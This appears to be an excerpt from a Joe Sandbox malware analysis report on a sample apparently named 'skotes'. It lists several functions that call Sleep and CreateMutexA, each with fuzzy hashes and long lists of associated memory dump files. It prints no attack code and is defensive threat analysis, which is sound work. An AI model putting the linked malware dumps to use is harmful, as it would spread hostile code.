Opcode Fuzzy Hash: 0af8b6f8411deb1ec4ec802459d8731af3d2a3d9d5f595edb115668984c6c077
Instruction Fuzzy Hash: 6A3124B1B04208ABEB08DBBCDDC876CB776FB96315F204219E218D73D5E77A59808652

Function 007FA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 0e26d0eca87da381caf1428e77c6272960002f9834c2174ff22678351f97737b
Instruction ID: 3478bfaa7f6913be420855af9decca867e0e2704a818540f34980145f92c2948
Opcode Fuzzy Hash: 0e26d0eca87da381caf1428e77c6272960002f9834c2174ff22678351f97737b
Instruction Fuzzy Hash: 303127B1A04248ABEB08EBBCDDC977DB661EB91315F204218E218DB3D5E7BD59C08653

Function 007FA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: da0aa04ec339c4d30ec3ba9afed285bd0553ce85cbc7aea9db39a347619d8121
Instruction ID: f8ac764d85569e90f1ae61a4555bc80e51b29372c3cc4c8e19fb163db4a7d21c
Opcode Fuzzy Hash: da0aa04ec339c4d30ec3ba9afed285bd0553ce85cbc7aea9db39a347619d8121
Instruction Fuzzy Hash: 4D312771604208ABEB08DB7CDCC5B7CB761EB85319F248218E518DB3D5E77D99908613

Function 007FA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e9622a3883a309802be7d38267d3e524db15056e9cd5fe58f9a9a4c8f9020a34
Instruction ID: 5a3c6fb2694ce4f006fd4beb2fca9157377604c7d274cd942b3c717f5ba2fd59
Opcode Fuzzy Hash: e9622a3883a309802be7d38267d3e524db15056e9cd5fe58f9a9a4c8f9020a34
Instruction Fuzzy Hash: FD318AB1604208ABEB08EB7CDDC4B7DB772EB81315F248218E118D73D6E77D59808263

Function 007F9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871286357.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871301786.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871318304.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871336545.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871351974.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 68d2deb2dbecfc66f563ff74701fc6a01fd253e9400115a415aa4a099d84f24f
Instruction ID: 802297fef87e5098b0502b87095edd4365d66edf416ce6bf0829ecd47789187d
Opcode Fuzzy Hash: 68d2deb2dbecfc66f563ff74701fc6a01fd253e9400115a415aa4a099d84f24f
Instruction Fuzzy Hash: 04213A71648204EBEB189B6CECC573CB761EBD1316F204229E618C73D5E7BE69808612

Function 007FA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000001.00000002.1870379278.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000001.00000002.1870363907.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870379278.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870436463.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870452759.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870471187.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870571380.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870590813.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870610980.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870647540.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870667832.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870685718.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870703174.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870719909.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870737422.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870756847.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870774962.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870790330.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870809087.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870828509.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870845141.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870860197.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870875908.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870891656.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870908519.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870935140.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870951071.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870967124.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1870984439.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871001796.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871018488.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871034283.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871050636.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871066600.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871081876.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871098485.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871114885.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871132734.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871149553.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871169372.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871185633.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871205402.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871221156.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1871267995.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
